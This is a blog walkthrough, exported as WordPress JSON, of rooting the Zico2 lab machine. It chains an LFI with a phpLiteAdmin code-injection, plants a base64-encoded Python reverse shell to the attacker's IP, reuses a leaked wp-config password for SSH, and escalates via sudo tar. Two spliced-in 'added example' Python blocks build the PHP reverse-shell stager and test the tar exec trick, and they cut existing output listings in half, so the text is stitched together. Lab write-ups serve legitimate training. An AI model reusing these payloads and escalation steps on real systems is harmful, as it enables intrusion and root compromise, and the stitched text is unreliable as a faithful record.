{"id":1184,"date":"2021-06-17T00:56:47","date_gmt":"2021-06-17T00:56:47","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1184"},"modified":"2021-06-17T01:00:50","modified_gmt":"2021-06-17T01:00:50","slug":"zico2-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/17\/zico2-1\/","title":{"rendered":"ZICO2: 1"},"content":{"rendered":"<h2>About the Machine<\/h2>\n<p><strong>Description:<\/strong><br \/>\nDoesn't work with VMware. Virtualbox only.<\/p>\n<p><strong>Vulnhub Page:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/zico2-1,210\/\">https:\/\/www.vulnhub.com\/entry\/zico2-1,210\/<\/a><\/p>\n<p><strong>Download Page:<\/strong> <a href=\"https:\/\/download.vulnhub.com\/zico\/zico2.ova\">https:\/\/download.vulnhub.com\/zico\/zico2.ova<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>First, locate the target's IP address. The attacking Kali box is 10.0.2.15, and an ARP sweep of the same \/24 is the quietest way to list the other guests on the VirtualBox network. The 08:00:27 OUI (registered to PCS Systemtechnik GmbH) is the one VirtualBox assigns to its virtual NICs; the nmap scan below confirms 10.0.2.6 as the target.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255\n        inet6 fe80::a00:27ff:fea6:1f86  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:a6:1f:86  txqueuelen 1000  (Ethernet)\n        RX packets 11  bytes 4438 (4.3 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 11  bytes 1142 (1.1 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali]\n\u2514\u2500# arp-scan -l\nInterface: eth0, type: EN10MB, MAC: 08:00:27:a6:1f:86, IPv4: 10.0.2.15\nStarting arp-scan 1.9.7 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n10.0.2.1    52:54:00:12:35:00   QEMU\n10.0.2.2    52:54:00:12:35:00   QEMU\n10.0.2.3    08:00:27:1f:e3:ff   PCS Systemtechnik GmbH\n10.0.2.6    08:00:27:81:10:28   PCS 
Systemtechnik GmbH\n\n4 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.9.7: 256 hosts scanned in 2.765 seconds (92.59 hosts\/sec). 4 responded\n<\/code><\/pre>\n<p>Next, a full-port nmap scan with version and OS detection. Four ports answer: SSH, HTTP, rpcbind, and the NFS status daemon (rpc.statd) that rpcbind registered on a high port. The OpenSSH 5.9p1 and Apache 2.2.22 package versions are the ones Ubuntu 12.04 shipped, so an old PHP and kernel are to be expected. Zico's Shop on port 80 is the place to start.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali]\n\u2514\u2500# nmap -p- -A -T4 10.0.2.6\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-06-16 18:45 EDT\nNmap scan report for 10.0.2.6\nHost is up (0.00085s latency).\nNot shown: 65531 closed ports\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)\n|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)\n|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)\n80\/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))\n|_http-server-header: Apache\/2.2.22 (Ubuntu)\n|_http-title: Zico&#039;s Shop\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          32890\/udp6  status\n|   100024  1          44197\/tcp   status\n|   100024  1          51071\/udp   status\n|_  100024  1          56680\/tcp6  status\n44197\/tcp open  status  1 (RPC #100024)\nMAC Address: 08:00:27:81:10:28 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 2.6.X|3.X\nOS CPE: cpe:\/o:linux:linux_kernel:2.6 cpe:\/o:linux:linux_kernel:3\nOS details: Linux 2.6.32 - 3.5\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.85 ms 10.0.2.6\n\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 25.99 seconds\n<\/code><\/pre>\n<p>Port 80 is the obvious place to start, so let's continue with nikto and dirb (only the dirb output is shown). The dbadmin directory and the extension-less view entry are the two results worth following up.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop\/lfi-project]\n\u2514\u2500# dirb http:\/\/10.0.2.6\/\n\n-----------------\nDIRB v2.22\nBy The Dark Raver\n-----------------\n\nSTART_TIME: Wed Jun 16 19:26:57 2021\nURL_BASE: http:\/\/10.0.2.6\/\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\n\n-----------------\n\nGENERATED WORDS: 4612\n\n---- Scanning URL: http:\/\/10.0.2.6\/ ----\n+ http:\/\/10.0.2.6\/cgi-bin\/ (CODE:403|SIZE:284)\n==&gt; DIRECTORY: http:\/\/10.0.2.6\/css\/\n==&gt; DIRECTORY: http:\/\/10.0.2.6\/dbadmin\/\n==&gt; DIRECTORY: http:\/\/10.0.2.6\/img\/\n+ http:\/\/10.0.2.6\/index (CODE:200|SIZE:7970)\n+ http:\/\/10.0.2.6\/index.html (CODE:200|SIZE:7970)\n==&gt; DIRECTORY: http:\/\/10.0.2.6\/js\/\n+ http:\/\/10.0.2.6\/LICENSE (CODE:200|SIZE:1094)
\n+ http:\/\/10.0.2.6\/package (CODE:200|SIZE:789)\n+ http:\/\/10.0.2.6\/server-status (CODE:403|SIZE:289)\n+ http:\/\/10.0.2.6\/tools (CODE:200|SIZE:8355)\n==&gt; DIRECTORY: http:\/\/10.0.2.6\/vendor\/\n+ http:\/\/10.0.2.6\/view (CODE:200|SIZE:0) <\/code><\/pre>\n<p><a href=\"http:\/\/10.0.2.6\/dbadmin\/\">http:\/\/10.0.2.6\/dbadmin\/<\/a> stands out, so I started browsing the site by hand. <strong><a href=\"http:\/\/10.0.2.6\/view.php?page\">http:\/\/10.0.2.6\/view.php?page<\/a>=<\/strong> caught my eye as a likely local file inclusion (the parameter names a page to include, and the empty 200 dirb reported for view fits an include with nothing to include), so I pointed my <a href=\"https:\/\/github.com\/kudayDOTsite\/lfi-project\" title=\"github project\">github project<\/a> at it, a tool I am still writing and only work on while solving machines.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop\/lfi-project]\n\u2514\u2500# python3 lfi-project.py                                        130 \u2a2f\n[*] Running the project behind a proxy is recommended; a tool like Burp will do. Read the code to change the default settings. If your settings are not ready you can quit with &#039;q&#039;.\n[*] Enter the target URL:\nhttp:\/\/10.0.2.6\/view.php?page=\nPlease choose the LFI type:\n1- Default\n2- Filter\n1\n[*] Do you want meaningless text scrolling in the terminal? (y\/n)n\n[*] How many times should ..\/ be applied? (e.g. 8)4\n<\/code><\/pre>\n<p>As the project's source shows, every request goes through a proxy, so the responses can be inspected in Burp, and they confirm that the include is real. An inclusion on its own only reads files, though; I could not get code execution from it directly, so I noted it down in case it became useful later.<\/p>\n<p>Continuing through the site, I logged in to <strong><a href=\"http:\/\/10.0.2.6\/dbadmin\/test_db.php\">http:\/\/10.0.2.6\/dbadmin\/test_db.php<\/a>?<\/strong> with the password <strong>admin<\/strong>, which is phpLiteAdmin's default. 
Searching for a phpLiteAdmin exploit (that is what the dbadmin login page runs) turned up the following.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop\/lfi-project]\n\u2514\u2500# searchsploit phpLiteAdmin\n------------------------------------------------ ---------------------------------\n Exploit Title                                  |  Path\n------------------------------------------------ ---------------------------------\nphpLiteAdmin - &#039;table&#039; SQL Injection           | php\/webapps\/38228.txt\nphpLiteAdmin 1.1 - Multiple Vulnerabilities     | php\/webapps\/37515.txt\nPHPLiteAdmin 1.9.3 - Remote PHP Code Injection  | php\/webapps\/24044.txt\nphpLiteAdmin 1.9.6 - Multiple Vulnerabilities   | php\/webapps\/39714.txt\n------------------------------------------------ ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop\/lfi-project]\n\u2514\u2500# cd ..
\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# locate php\/webapps\/24044.txt\n\/usr\/share\/exploitdb\/exploits\/php\/webapps\/24044.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# cat \/usr\/share\/exploitdb\/exploits\/php\/webapps\/24044.txt\n# Exploit Title: phpliteadmin &lt;= 1.9.3 Remote PHP Code Injection Vulnerability\n# Google Dork: inurl:phpliteadmin.php (Default PW: admin)\n# Date: 01\/10\/2013\n# Exploit Author: L@usch - http:\/\/la.usch.io - http:\/\/la.usch.io\/files\/exploits\/phpliteadmin-1.9.3.txt\n# Vendor Homepage: http:\/\/code.google.com\/p\/phpliteadmin\/\n# Vendor Status: Informed\n# Software Link: http:\/\/phpliteadmin.googlecode.com\/files\/phpliteadmin_v1-9-3.zip\n# Version: 1.9.3\n# Tested on: Windows and Linux\n\nDescription:\n\nphpliteadmin.php#1784: &#039;Creating a New Database&#039; =&gt; \nphpliteadmin.php#1785: &#039;When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.&#039;,\n\nAn Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.\n\nProof of Concept:\n\n1. We create a db named &quot;hack.php&quot;.\n(Depending on Server configuration sometimes it will not work and the name for the db will be &quot;hack.sqlite&quot;. Then simply try to rename the database \/ existing database to &quot;hack.php&quot;.)\nThe script will store the sqlite database in the same directory as phpliteadmin.php.\nPreview: http:\/\/goo.gl\/B5n9O\nHex preview: http:\/\/goo.gl\/lJ5iQ\n\n2. Now create a new table in this database and insert a text field with the default value:\n&lt;?php phpinfo()?&gt;\nHex preview: http:\/\/goo.gl\/v7USQ\n\n3. 
Now we run hack.php\n\nDone!\n\nProof: http:\/\/goo.gl\/ZqPVL\n<\/code><\/pre>\n<p>I followed those steps in order: a new database named hack.php, then a table with a column whose default value is the PHP. phpLiteAdmin writes the file into its configured $directory, which on this box is \/usr\/databases, outside the web root, so the include found earlier is what makes the file reachable. With the test payload <strong>&lt;?php system(&quot;which nc; cat \/etc\/passwd; which python;&quot;); ?&gt;<\/strong> as the default value, requesting <strong><a href=\"http:\/\/10.0.2.6\/view.php?page=..\/..\/..\/..\/usr\/databases\/hack.php\">http:\/\/10.0.2.6\/view.php?page=..\/..\/..\/..\/usr\/databases\/hack.php<\/a><\/strong> returned:<\/p>\n<pre><code>SQLite format 3\u0004\u0001\u0001@ \u001d\u0002\u0016\u0001\u0001\u001d-\u00e2! \u0001\u0003\u20ac\u0003\u20ac~\u0001\u0007\u0017\u0015\u0015\u0001\u0081_tabletesttest\u0002CREATE TABLE &#039;test&#039; (&#039;cmd&#039; TEXT default &#039;\/bin\/nc root:x:0:0:root:\/root:\/bin\/bash daemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh bin:x:2:2:bin:\/bin:\/bin\/sh sys:x:3:3:sys:\/dev:\/bin\/sh sync:x:4:65534:sync:\/bin:\/bin\/sync games:x:5:60:games:\/usr\/games:\/bin\/sh man:x:6:12:man:\/var\/cache\/man:\/bin\/sh lp:x:7:7:lp:\/var\/spool\/lpd:\/bin\/sh mail:x:8:8:mail:\/var\/mail:\/bin\/sh news:x:9:9:news:\/var\/spool\/news:\/bin\/sh uucp:x:10:10:uucp:\/var\/spool\/uucp:\/bin\/sh proxy:x:13:13:proxy:\/bin:\/bin\/sh www-data:x:33:33:www-data:\/var\/www:\/bin\/sh backup:x:34:34:backup:\/var\/backups:\/bin\/sh list:x:38:38:Mailing List Manager:\/var\/list:\/bin\/sh irc:x:39:39:ircd:\/var\/run\/ircd:\/bin\/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/bin\/sh nobody:x:65534:65534:nobody:\/nonexistent:\/bin\/sh libuuid:x:100:101::\/var\/lib\/libuuid:\/bin\/sh syslog:x:101:103::\/home\/syslog:\/bin\/false messagebus:x:102:105::\/var\/run\/dbus:\/bin\/false ntp:x:103:108::\/home\/ntp:\/bin\/false sshd:x:104:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin vboxadd:x:999:1::\/var\/run\/vboxadd:\/bin\/false statd:x:105:65534::\/var\/lib\/nfs:\/bin\/false mysql:x:106:112:MySQL Server,,,:\/nonexistent:\/bin\/false zico:x:1000:1000:,,,:\/home\/zico:\/bin\/bash \/usr\/bin\/python &quot;)&#039;) \u0004\n<\/code><\/pre>\n<p>The SQLite header and the CREATE TABLE text come back verbatim because PHP only interprets what sits between the &lt;?php and ?&gt; tags and echoes every other byte; the command output in the middle shows nc at \/bin\/nc, a full \/etc\/passwd with one real user (zico, uid 1000, with a bash shell), and python at <strong>\/usr\/bin\/python<\/strong>. So we have command execution as the web server user and python to work with. I set up a python reverse shell, base64-encoded so that none of the one-liner's quotes end up inside the SQL string literal that holds the default value, and repeated the phpLiteAdmin steps with the payload below.<\/p>\n<pre><code class=\"language-php\">\n&lt;?php system(base64_decode(&quot;cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4yLjE1IiwxODIyKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9iYXNoIikn&quot;)); ?&gt;\n<\/code><\/pre>\n<p>Decoded, the base64 is the usual python connect-back: open a TCP socket to the attacker, duplicate it over stdin, stdout and stderr, and spawn bash under a pty so the shell is interactive.<\/p>\n<pre><code class=\"language-sh\">python -c &#039;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.2.15&quot;,1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code><\/pre>\n<p>With nc already listening on port 1822, requesting hack.php through the include triggered the payload and the shell came back as www-data, the Apache user.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# nc -lvp 1822\nlistening on [any] 1822 ...\n10.0.2.6: inverse host lookup failed: Unknown host\nconnect to [10.0.2.15] from (UNKNOWN) [10.0.2.6] 58813\nwww-data@zico:\/var\/www$ ls\nls\nLICENSE    css      gulpfile.js  index.html  less      tools.html  view.php\nREADME.md  dbadmin  img      js      package.json  
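<\/code><\/pre>
<p>Two details in the steps above deserve a closer look: why a SQLite file with a .php name executes at all, and why the command is base64-wrapped. The added example below (written for this edit; not the author's code and not part of phpLiteAdmin) builds the same kind of file locally with Python's sqlite3 module, with a table whose column default holds the PHP stager, and checks that the stager survives byte-for-byte inside the binary file, which is the property the include relies on. The listener address 10.0.2.15:1822 is taken from the post; the hack.php file name, the table layout and the temporary directory are assumptions.<\/p>
```python
import base64
import os
import sqlite3
import tempfile


def python_reverse_shell(lhost, lport):
    # Same one-liner the walkthrough encodes: connect back, dup the socket over
    # stdin/stdout/stderr, then spawn an interactive bash under a pty.
    script = (
        'import socket,subprocess,os;'
        's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
        f's.connect(("{lhost}",{lport}));'
        'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);'
        'import pty;pty.spawn("/bin/bash")'
    )
    return f"python -c '{script}'"


def php_stager(command):
    # Base64 keeps the one-liner's quotes, semicolons and slashes out of the SQL
    # default value, so nothing in it can break the CREATE TABLE statement or get
    # mangled on the way into the file.
    b64 = base64.b64encode(command.encode()).decode()
    return f'<?php system(base64_decode("{b64}")); ?>'


def build_sqlite_with_php(path, php):
    # Mimic the phpLiteAdmin steps: a database file with a .php name and a table
    # whose column default is the PHP. SQLite stores the CREATE TABLE text verbatim
    # in sqlite_master, so the tag lands in the file unchanged.
    conn = sqlite3.connect(path)
    with conn:
        conn.execute(
            "CREATE TABLE test (cmd TEXT DEFAULT '%s')" % php.replace("'", "''")
        )
    conn.close()
    with open(path, 'rb') as fh:
        return fh.read()


def stager_survives(blob, php):
    # What PHP's include sees: a valid SQLite file with one <?php ... ?> island in it.
    return blob.startswith(b'SQLite format 3') and php.encode() in blob


def demo(lhost='10.0.2.15', lport=1822):
    # Returns (php stager, file bytes, survives?) for a throwaway hack.php.
    php = php_stager(python_reverse_shell(lhost, lport))
    with tempfile.TemporaryDirectory() as d:
        blob = build_sqlite_with_php(os.path.join(d, 'hack.php'), php)
    return php, blob, stager_survives(blob, php)


if __name__ == '__main__':
    php, blob, ok = demo()
    print(php)
    print(len(blob), 'bytes,', 'stager intact' if ok else 'stager mangled')
```
<p>Running it prints the stager and confirms that the file still starts with the SQLite magic and carries the PHP island intact. The base64 matters because the one-liner contains single quotes, and a single quote is what terminates the SQL string literal built for the default value; the encoded form contains nothing that needs escaping. On the defensive side, nothing here would work if phpLiteAdmin forced a database extension and the include validated its argument.<\/p>
<pre><code class=\"language-sh\">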
vendor\n<\/code><\/pre>\n<p>Looking around as www-data, I found a WordPress install under zico's home directory with a world-readable wp-config.php and tried its database credentials against SSH. The to_do.txt in the same directory lists joomla, bootstrap with phpliteadmin, and wordpress, which is a useful hint about where configuration files with secrets will be.<\/p>\n<pre><code class=\"language-sh\">www-data@zico:\/tmp$ cd \/home\ncd \/home\nwww-data@zico:\/home$ ls\nls\nzico\nwww-data@zico:\/home$ cd zico\ncd zico\nwww-data@zico:\/home\/zico$ ls\nls\nbootstrap.zip                to_do.txt      zico-history.tar.gz\njoomla                   wordpress\nstartbootstrap-business-casual-gh-pages  wordpress-4.8.zip\nwww-data@zico:\/home\/zico$ cat to_do*\ncat to_do*\n\ntry list:\n- joomla\n- bootstrap (+phpliteadmin)\n- wordpress\n\nwww-data@zico:\/home\/zico$ cd wordpress\ncd wordpress\nwww-data@zico:\/home\/zico\/wordpress$ ls\nls\nindex.php    wp-blog-header.php    wp-includes    wp-settings.php\nlicense.txt  wp-comments-post.php  wp-links-opml.php  wp-signup.php\nreadme.html  wp-config.php         wp-load.php    wp-trackback.php\nwp-activate.php  wp-content        wp-login.php   xmlrpc.php\nwp-admin     wp-cron.php           wp-mail.php\n\nwww-data@zico:\/home\/zico\/wordpress$ head wp-config.php -n 40\nhead wp-config.php -n 40\n&lt;?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the\n * installation. 
You don&#039;t have to use the web site, you can\n * copy this file to &quot;wp-config.php&quot; and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * MySQL settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/codex.wordpress.org\/Editing_wp-config.php\n *\n * @package WordPress\n *\/\n\n\/\/ ** MySQL settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine(&#039;DB_NAME&#039;, &#039;zico&#039;);\n\n\/** MySQL database username *\/\ndefine(&#039;DB_USER&#039;, &#039;zico&#039;);\n\n\/** MySQL database password *\/\ndefine(&#039;DB_PASSWORD&#039;, &#039;sWfCsfJSPV9H3AmQzw8&#039;);\n\n\/** MySQL hostname *\/\ndefine(&#039;DB_HOST&#039;, &#039;zico&#039;);\n\n\/** Database Charset to use in creating database tables. *\/\ndefine(&#039;DB_CHARSET&#039;, &#039;utf8&#039;);\n\n\/** The Database Collate type. Don&#039;t change this if in doubt. *\/\ndefine(&#039;DB_COLLATE&#039;, &#039;&#039;);\n\n\/**#@+\nwww-data@zico:\/home\/zico\/wordpress$<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# ssh zico@10.0.2.6               \nThe authenticity of host &#039;10.0.2.6 (10.0.2.6)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:+zgKqxyYlTBxVO0xtTVGBokreS9Zr71wQGvnG\/k2igw.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nWarning: Permanently added &#039;10.0.2.6&#039; (ECDSA) to the list of known hosts.\nzico@10.0.2.6&#039;s password: \n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\nzico@zico:~$ whoami\nzico\n<\/code><\/pre>\n<p>The MySQL password from wp-config.php was reused for the zico account, so SSH let me straight in. Enumerating from that account, sudo -l shows two binaries zico may run as root without a password.<\/p>\n<pre><code class=\"language-sh\">zico@zico:~$ sudo -l\nMatching Defaults entries for zico on this host:\n    env_reset, exempt_group=admin, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser zico may run the following commands on this host:\n    (root) NOPASSWD: \/bin\/tar\n    (root) NOPASSWD: \/usr\/bin\/zip<\/code><\/pre>\n<p>I then looked for a way to turn <strong>\/bin\/tar<\/strong> into root and found <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/tar\/\" title=\"this page\">this page<\/a> on GTFOBins. Each of the commands below gives a shell as whoever runs tar, so under this sudo rule they give root (zip has its own GTFOBins entry, so the second rule is just as bad).<\/p>\n<pre><code>Shell\nIt can be used to break out from restricted environments by spawning an interactive system shell.\n\ntar -cf \/dev\/null \/dev\/null --checkpoint=1 --checkpoint-action=exec=\/bin\/sh\nThis only works for GNU tar.\n\ntar xf \/dev\/null -I &#039;\/bin\/sh -c &quot;sh &lt;&amp;2 1&gt;&amp;2&quot;&#039;\nThis only works for GNU tar. 
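<\/code><\/pre>
<p>Before running the sudo version it helps to see what the first GTFOBins line actually does: --checkpoint=1 makes GNU tar pause after every record, and --checkpoint-action=exec= hands a command to \/bin\/sh at each pause, so the command runs as whoever launched tar. The added example below (written for this edit; not GTFOBins code and not from the original post) proves that mechanism without sudo by having the action touch a marker file, and also pulls the NOPASSWD rules out of a sudo -l listing so that each binary can be looked up on GTFOBins. The tar path, the temporary directory and the sample sudo -l text (a shortened copy of the output above) are assumptions.<\/p>
```python
import os
import re
import subprocess
import tempfile

# sudo -l rule lines look like:  (root) NOPASSWD: /bin/tar
SUDO_RULE_RE = re.compile('^ *[(]([^)]+)[)] +((?:[A-Z]+: *)*)(.+)$', re.M)

# Constructed copy of the sudo -l output on this box (Defaults line shortened).
SAMPLE_SUDO_L = '''Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
'''


def is_gnu_tar(tar='tar'):
    # --checkpoint-action is a GNU extension; bsdtar and busybox tar do not honour it.
    try:
        out = subprocess.run([tar, '--version'], capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return False
    return out.returncode == 0 and 'GNU tar' in out.stdout


def checkpoint_exec_runs(tar='tar'):
    # The GTFOBins invocation with a harmless action instead of /bin/sh. Under sudo
    # the action would run as root; here it only proves that tar executes it.
    with tempfile.TemporaryDirectory() as d:
        marker = os.path.join(d, 'marker')
        subprocess.run(
            [tar, '-cf', '/dev/null', '/dev/null', '--checkpoint=1',
             '--checkpoint-action=exec=touch ' + marker],
            capture_output=True, timeout=30, check=False,
        )
        return os.path.exists(marker)


def nopasswd_commands(sudo_l_output):
    # Every (runas) NOPASSWD: command from sudo -l; each one is a GTFOBins lookup.
    # Both entries on this box, tar and zip, have sudo sections there.
    found = []
    for runas, tags, cmds in SUDO_RULE_RE.findall(sudo_l_output):
        if 'NOPASSWD' in tags:
            found.extend((runas, cmd.strip()) for cmd in cmds.split(','))
    return found


if __name__ == '__main__':
    print('NOPASSWD rules:', nopasswd_commands(SAMPLE_SUDO_L))
    if is_gnu_tar():
        print('checkpoint action executed:', checkpoint_exec_runs())
    else:
        print('not GNU tar here; the checkpoint trick does not apply')
```
<p>On the fix side: remove the rule. If tar really has to stay in sudoers, sudo's NOEXEC tag stops it from executing the checkpoint action (and the --to-command and -I helpers), with the caveat that noexec only covers dynamically linked binaries; zip needs the same treatment.<\/p>
<pre><code>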
It can be useful when only a limited command argument injection is available.\n\nTF=$(mktemp)\necho &#039;\/bin\/sh 0&lt;&amp;1&#039; &gt; &quot;$TF&quot;\ntar cf &quot;$TF.tar&quot; &quot;$TF&quot;\ntar xf &quot;$TF.tar&quot; --to-command sh\nrm &quot;$TF&quot;*<\/code><\/pre>\n<p>Let's try the first one. With --checkpoint=1, GNU tar fires a checkpoint after every record it writes, and --checkpoint-action=exec= runs the given command through \/bin\/sh at each checkpoint; because sudo runs tar as root without asking for a password, that command is a root shell.<\/p>\n<pre><code class=\"language-sh\">\nzico@zico:~$ sudo \/bin\/tar -cf \/dev\/null \/dev\/null --checkpoint=1 --checkpoint-action=exec=\/bin\/sh\n\/bin\/tar: Removing leading `\/&#039; from member names\n# whoami\nroot\n# cd \/root\n# ls\nflag.txt\n# cat flag.txt\n#\n#\n#\n# ROOOOT!\n# You did it! Congratz!\n# \n# Hope you enjoyed! \n# \n# \n#\n#\n\n# \n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>About the Machine Description: Doesn&#8217;t work with VMware. Virtualbox only. Vulnhub Page: https:\/\/www.vulnhub.com\/entry\/zico2-1,210\/ Download Page: https:\/\/download.vulnhub.com\/zico\/zico2.ova Walkthrough First, locate the target's IP address. 
\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali] \u2514\u2500# ifconfig&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/17\/zico2-1\/\">Read more<span class=\"screen-reader-text\">ZICO2: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[516,517],"class_list":["post-1184","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-tar","tag-zip","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1184","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1184"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1184\/revisions"}],"predecessor-version":[{"id":1187,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1184\/revisions\/1187"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1184"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1184"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}